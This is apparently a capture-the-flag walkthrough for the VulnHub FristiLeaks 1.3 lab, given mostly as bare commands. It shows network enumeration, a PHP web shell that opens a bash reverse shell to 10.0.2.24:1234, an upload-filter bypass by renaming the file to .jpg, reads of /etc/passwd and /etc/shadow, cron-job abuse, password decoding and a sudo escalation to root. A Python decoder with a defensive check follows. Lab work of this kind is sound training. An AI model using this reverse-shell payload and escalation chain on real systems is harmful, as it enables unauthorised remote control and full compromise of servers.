VulnHub: FRISTILEAKS: 1.3

  1. Network Discovery
nmap -sn 10.0.2.24/24
nmap -Pn 10.0.2.12
nmap -A -p80 10.0.2.12
nmap --script vuln -p80 10.0.2.12
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.12/ -x php,txt,html,sh,cgi
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.2.24/1234 0>&1'");
?>
rlwrap nc -lvp 1234
mv shell.php shell.jpg
http://10.0.2.12/fristi/uploads/shell.jpg
cp shell.php shell.php.jpg
whoami
cat /etc/passwd
ls -la /etc/passwd
ls -la /etc/shadow
cat notes.txt
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
cd /tmp
ls -la
cd /home/admin
ls -la
cat cronjob.py
cat cryptedpass.txt
cat whoisyourgodnow.txt
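import base64
import codecs
# Undo the obfuscation: reverse the string, apply rot13, then base64-decode
def decodeString(str):
    base64string = codecs.decode(str[::-1], 'rot13')
    return base64.b64decode(base64string)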
su fristigod
sudo -l
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
whoami
cd /root
ls -la
cat fristileaks_secrets.txt
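
The decodeString function above needs no key: the stored password is only reversed, rot13-shifted and base64-encoded, so anyone who can read the file recovers it. As an added example (not code from the original page or from the target machine), this Python 3 version carries the round trip through on a constructed sample and adds a check a defender could run over stored values to flag such keyless encodings; encode_string, is_reversible_encoding and the sample value are assumptions.

```python
import base64
import binascii
import codecs


def encode_string(plain: str) -> str:
    """Assumed inverse of decodeString: base64, then reverse, then rot13."""
    b64 = base64.b64encode(plain.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def decode_string(blob: str) -> str:
    """Python 3 form of decodeString that returns text instead of bytes."""
    b64 = codecs.decode(blob.strip()[::-1], "rot13")
    # validate=True rejects characters outside the base64 alphabet
    return base64.b64decode(b64, validate=True).decode("utf-8")


def is_reversible_encoding(blob: str) -> bool:
    """True when blob decodes to non-empty printable text without any key,
    meaning the stored value protects nothing once the file is readable."""
    try:
        text = decode_string(blob)
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return False
    return bool(text) and text.isprintable()


# Constructed sample, not a value taken from the target machine.
SAMPLE_SECRET = "Constructed-Passw0rd!"
SAMPLE_BLOB = encode_string(SAMPLE_SECRET)

if __name__ == "__main__":
    print(SAMPLE_BLOB)
    print(decode_string(SAMPLE_BLOB))
    print(is_reversible_encoding(SAMPLE_BLOB))
    print(is_reversible_encoding("not an encoded secret"))
```

Storing a salted password hash, or keeping the secret out of world-readable files, removes the value this check looks for.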

ratiros01